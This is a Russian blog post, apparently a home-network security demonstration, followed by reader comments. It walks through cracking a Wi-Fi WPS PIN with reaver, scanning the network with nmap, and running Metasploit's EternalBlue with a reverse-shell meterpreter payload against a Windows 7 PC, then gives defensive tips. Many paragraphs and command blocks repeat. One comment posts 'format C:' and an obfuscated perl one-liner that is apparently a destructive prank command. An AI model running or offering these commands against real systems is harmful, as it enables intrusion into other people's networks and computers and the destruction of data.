22647
8
В связи с усилением киберугроз меня попросили проверить на информационную безопасность одну систему.
В данном посте я наглядно покажу, насколько вы уязвимы и дам рекомендации, как избежать проникновения в ваш компьютер.
Все написанное ниже носит информационный характер с целью повышения компьютерной грамотности населения не оскорбляя чувств верующих и помним что ИГИЛ и Хайат Тахрир аш-Шам запрещенные в России террористические организации.
В данном посте я наглядно покажу, насколько вы уязвимы и дам рекомендации, как избежать проникновения в ваш компьютер.
Все написанное ниже носит информационный характер с целью повышения компьютерной грамотности населения не оскорбляя чувств верующих и помним что ИГИЛ и Хайат Тахрир аш-Шам запрещенные в России террористические организации.
Проникать в сеть тестируемого мы будем, через сеть wi-fi.
Практически все из вас используют домашние wi-fi роутеры, конечно это удобно, но и открывает возможности, для злоумышленников.
Сперва нам необходимо узнать, как называется наша беспроводная сетевая карта, для этого вводим команду
# ifconfig
Видим 3 интерфейса - проводной, лупбэк и наш искомый беспроводной wlan0
Практически все из вас используют домашние wi-fi роутеры, конечно это удобно, но и открывает возможности, для злоумышленников.
Сперва нам необходимо узнать, как называется наша беспроводная сетевая карта, для этого вводим команду
# ifconfig
Видим 3 интерфейса - проводной, лупбэк и наш искомый беспроводной wlan0
Теперь, когда мы выяснили название своего беспроводного интерфейса, необходимо перевести его в режим мониторинга.
# airmon-ng check kill - убиваем процессы висящие на интерфейсе
# airmon-ng start wlan0 - переводим интерфейс в режим мониторинга
В итоге у нас появится интерфейс wlan0mon
# airmon-ng check kill - убиваем процессы висящие на интерфейсе
# airmon-ng start wlan0 - переводим интерфейс в режим мониторинга
В итоге у нас появится интерфейс wlan0mon
×
Посмотрим, что у нас творится в эфире
# wash -i wlan0mon
Мы с вами видим, что у нас есть 5 точек доступа wi-fi поблизости.
Получаем MAC-адрес точки доступа, канал, силу сигнала, статус wps, производителя беспроводного чипа и имя точки, в данном случае нас интересует столбец Lck.
Как видим у большинства WPS не отключен, была придумана данная технология, для облегчения жизни простых пользователей, для быстрого подключения устройств по пин-коду, но на практике дома ни кто этим не пользуется и ни кто как правило ее не отключает, а зря т.к. она действительно облегчила жизнь но другим нехорошим человекам.
# wash -i wlan0mon
Мы с вами видим, что у нас есть 5 точек доступа wi-fi поблизости.
Получаем MAC-адрес точки доступа, канал, силу сигнала, статус wps, производителя беспроводного чипа и имя точки, в данном случае нас интересует столбец Lck.
Как видим у большинства WPS не отключен, была придумана данная технология, для облегчения жизни простых пользователей, для быстрого подключения устройств по пин-коду, но на практике дома ни кто этим не пользуется и ни кто как правило ее не отключает, а зря т.к. она действительно облегчила жизнь но другим нехорошим человекам.
Мы с вами воспользуемся этой уязвимостью WPS, узнаем пин-код и через него пароль, для wi-fi сети.
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -K
В итоге мы с вами благополучно получили WPS pin: <*****>
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -K
В итоге мы с вами благополучно получили WPS pin: <*****>
Добавляем к команде наш пин-код и через 30 сек получаем пароль от wi-fi - WPA PSK: <******>
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -p <Пин-код>
# reaver -i wlan0mon -b <MAC-адрес точки wi-fi> -p <Пин-код>
Теперь мы можем спокойно подключиться к wi-fi сети и посмотреть, что в ней имеется.
Видим, что мы получили по dhcp ip-адресс 192.168.0.102, а сеть у нас 192.168.0.0/24
# nmap -sn 192.168.0.0/24
В сети у нас 3 устройства:
192.168.0.1 - wi-fi router TP-Link, кстати логин/пароль были стандартные admin/admin
192.168.0.112 - Компьютер тестируемого
192.168.0.102 - это мы
Посмотрим, какие службы запущены на компьютере:
# nmap 192.168.0.112
Видим, что мы получили по dhcp ip-адресс 192.168.0.102, а сеть у нас 192.168.0.0/24
# nmap -sn 192.168.0.0/24
В сети у нас 3 устройства:
192.168.0.1 - wi-fi router TP-Link, кстати логин/пароль были стандартные admin/admin
192.168.0.112 - Компьютер тестируемого
192.168.0.102 - это мы
Посмотрим, какие службы запущены на компьютере:
# nmap 192.168.0.112
На компьютере открыты стандартные порты расшарок, smb. Установлена Windows 7
Многие наверное слышали про уязвимости, через которые в наши компьютеры проникали сотрудники АНБ, позже через эти дыры компьютеры по всему миру заразились вирусом-шифровальщиков WannaCry, а позже и Petya.
Хоть сейчас на дворе уже 2019 год, у многих дома стоят пиратские версии Windows, которые до сих пор не пропатчены из-за боязни что "слетит" активация или просто изза беспечности и пофигизма.
На скриншоте выше мы видим, что у нас есть 1902 варианта поиметь несчастный компьютер.
Запускаем Metasploit
# msfconsole
Многие наверное слышали про уязвимости, через которые в наши компьютеры проникали сотрудники АНБ, позже через эти дыры компьютеры по всему миру заразились вирусом-шифровальщиков WannaCry, а позже и Petya.
Хоть сейчас на дворе уже 2019 год, у многих дома стоят пиратские версии Windows, которые до сих пор не пропатчены из-за боязни что "слетит" активация или просто изза беспечности и пофигизма.
На скриншоте выше мы видим, что у нас есть 1902 варианта поиметь несчастный компьютер.
Запускаем Metasploit
# msfconsole
Выбираем наш эксплоит от АНБ - EthernalBlue
# use exploit/windows/smb/ms17_010_eternalblue
Указываем ip-адресс проверямого
# set RHOST 192.168.0.112
Указываем свой ip-адресс
# set LHOST 192.168.0.102
Указываем рабочую нагрузку
# set payload windows/meterpreter/reverse_tcp
Процесс в который будем внедряться
# set processinject lsass.exe
Запускаем эксплоит, мы в системе с полными правами, делаем что хотим.
# exploit
Рекомендации, как защитится от этого:
1. Прошить свой wi-fi роутер последней прошивкой., если она не обновляется на сайте, купить новый роутер
2. Отключить WPS на роутере, вы таким образом закроете потенциальную дыру, которой вы все равно не пользуетесь.
3. Установить сложные пароли: минимум 10 символов включающие в себя цифры, буквы в разном регистре и спецсимволы.
4. Своевременно обновлять операционную систему и пользоваться лицензионным ПО.
5. Установить лицензионное комплексное программное обеспечение включающее в себя антивирус/межсетевой экран/систему предотвращения вторжений или превентивную защиту.
Отвечу на ваши вопросы, если они появятся в комментариях к посту.
# use exploit/windows/smb/ms17_010_eternalblue
Указываем ip-адресс проверямого
# set RHOST 192.168.0.112
Указываем свой ip-адресс
# set LHOST 192.168.0.102
Указываем рабочую нагрузку
# set payload windows/meterpreter/reverse_tcp
Процесс в который будем внедряться
# set processinject lsass.exe
Запускаем эксплоит, мы в системе с полными правами, делаем что хотим.
# exploit
Рекомендации, как защитится от этого:
1. Прошить свой wi-fi роутер последней прошивкой., если она не обновляется на сайте, купить новый роутер
2. Отключить WPS на роутере, вы таким образом закроете потенциальную дыру, которой вы все равно не пользуетесь.
3. Установить сложные пароли: минимум 10 символов включающие в себя цифры, буквы в разном регистре и спецсимволы.
4. Своевременно обновлять операционную систему и пользоваться лицензионным ПО.
5. Установить лицензионное комплексное программное обеспечение включающее в себя антивирус/межсетевой экран/систему предотвращения вторжений или превентивную защиту.
Отвечу на ваши вопросы, если они появятся в комментариях к посту.
Ссылки по теме:
- Обзор операционной системы Antergos
- Fedora 29: Тестируем очередной Linux
- Обзор очередного Linux-релиза на Фишках. Препарируем KaOS
- Обзор операционной системы Ubuntu 18.04
- Обзор операционной системы ОСь
Новости партнёров
реклама
Пояснение еще раз для "крутых сисадминов" с мегазащитой в виде блокировки мак-адресов, службой безопасности, пропускным режимом по сетчатке глаза и самописными операционными системами на санскрите - данный пост предназначен, для простых домашних пользователей, которые о таких вещах не задумываются, а после прочтения поста, хотябы сменят стандартный пароль на роутере.
Есть версии и для Windows, на худой конец если у вас Win10 можно запустить через wsl или установить виртуальную машину.
И мне бы попроще, для ламеров...
Также был бы очень благодарен за подробную инструкцию о том, как выборочно поглядеть и выборочно почистить кукисы именно в W-7
Инициатива похвальна, но по опыту могу сказать что большинству на все это пофиг и только когда придет большой Песец все начинают винить все вокруг но не самих себя
Безопасность часто идет в разрез с удобством и многие забивают на нее со словами "да кому я нужен"
Стандартная страшилка.
Ну кто и для чего будет взламывать домашний комп обычного человека в многоквартирном доме?
Хрен вам!!!
Я уже и без антивируса лет 7 живу. Иногда, ради интереса, ставлю пробник, сканирую и удаляю.
Это пока ваш почтовый ящик ну стал рассылать спам. Страница в социальной сети не стала рассадником рекламы.
Ну и напоследок любой вирус шифровальщик с радостью испортит коллекцию семейных фотографий
А если серьезно данная схема стиля "как насрать соседу под дверью" :
1 - WPS коды отключены по умолчанию года три, только кнопка
2 - Для полного перебора WPS нужно 11 000 вариантов , что даже при банальная защита растянет перебор на долго
3 - Автор не делает никаких действий чтоб скрыть свое присутствие в сети. А зная МАС атакующего можно много узнать о нем
4 - Сканирование через nmap - Идеально чтоб переполошить всю систему безопасности. Запомните мамкины хакеры - взлом должен быть не замечен, а что творится тут напоминает въезд в парадную дверь с сиренами и фейерверками
5 - "Установить сложные пароли: минимум 10 символов включающие в себя цифры, буквы в разном регистре и спецсимволы." Мы же ломали WPS - как тут поможет пароль ?
Так что так можно ломать разве что соседский роутер и не факт что не попадется какой нибудь айтишник который и научит больше так не делать
Автор, подчитнул линукс командлеты?)
Давай теперь с комадлетами циско выпендрись.
>>format С:
что бы закрепить результат
sudo cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
2) аффтар забыл упомянуть мелкую деталь: Ривер просто использует перебор для выяснения пина и может потратить на это полдня. А может и вообще не суметь подобрать - на большинстве роутеров по дефолту пин отключен, возможно только подключение по кнопке. Ну и там загогулины всякие типа таймаута между попытками, пина из 10 цифр и прочего
/ip service
set telnet address=192.168.1.0/24 disabled=yes
set ftp address=192.168.1.0/24 disabled=yes
set www address=192.168.1.0/24 disabled=yes
set ssh address=192.168.1.0/24 disabled=yes
set www-ssl address=192.168.1.0/24 disabled=yes
set api address=192.168.1.0/24 disabled=yes
set winbox address=192.168.1.0/24
set api-ssl address=192.168.1.0/24 disabled=yes